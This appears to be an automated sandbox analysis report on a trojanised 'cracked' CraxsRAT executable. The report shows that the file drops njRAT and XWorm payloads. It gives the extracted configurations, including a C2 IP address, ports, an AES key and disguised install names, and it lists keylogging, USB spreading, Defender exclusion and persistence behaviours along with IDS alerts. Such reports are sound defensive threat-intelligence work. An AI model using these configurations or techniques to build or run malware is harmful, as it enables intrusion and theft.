Windows Analysis Report
CraxsRAT v7.6 Cracked.exe

Overview

General Information

Sample name:	CraxsRAT v7.6 Cracked.exe
Analysis ID:	1549855
MD5:	8310bdf3ac82001830f75c15fba8cc15
SHA1:	581d729268cbd245d091633cc19692c4b5bfa0af
SHA256:	f7f52f6bbffa02fffcea30d5806050b7702a9a78dcbeae83e28c45d81aa1c4c4
Tags:	exeuser-___
Infos:

Detection

Njrat, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Njrat

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Contains functionality to spread to USB devices (.Net source)

Creates autostart registry keys with suspicious names

Creates files with lurking names (e.g. Crack.exe)

Creates multiple autostart registry keys

Disables zone checking for all users

Drops PE files to the startup folder

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the windows firewall

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CraxsRAT v7.6 Cracked.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Avira: detection malicious, Label: ANDROID/SpyNote.mcdzu
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["45.145.41.178"], "Port": 1111, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "Porno.exe", "Version": "XWorm V5.6"}
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack	Malware Configuration Extractor: Njrat {"Host:Port": ["45.145.41.178:2222"], "Campaign ID": "HacKed", "Install File": "Windows Defender Real Time Protection.exe", "Install Folder": "TEMP", "Version": "0.12G", "Network Seprator": "\|'\|'\|"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Virustotal: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Virustotal: Detection: 76%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: CraxsRAT v7.6 Cracked.exe	ReversingLabs: Detection: 63%
Source: CraxsRAT v7.6 Cracked.exe	Virustotal: Detection: 54%			Perma Link

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: CraxsRAT v7.6 Cracked.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: 45.145.41.178
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: 1111
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: <123456789>
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: Porno.exe
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: %AppData%
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: Windows Defender Notification.exe

Uses 32bit PE files

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Spreading

Contains functionality to spread to USB devices (.Net source)

Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs	.Net Code: USBspr
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, OK.cs	.Net Code: USBspr
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, OK.cs	.Net Code: USBspr

May infect USB drives

Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf![autorun]
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [autorun]

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53740 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53756 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53756 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53740 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53783 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53799 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53707 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:63387 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53783 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:63387 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53799 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53707 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53723 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53723 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53772 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53772 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53827 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53827 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53841 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53841 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53814 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53814 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53876 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53876 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53859 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53859 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53891 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53891 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53904 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53904 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53922 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53922 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53940 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53940 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53957 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53977 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53977 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53985 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53957 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53985 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53983 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53983 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53986 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53984 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53986 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53984 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54004 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54004 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54000 -> 45.145.41.178:2222
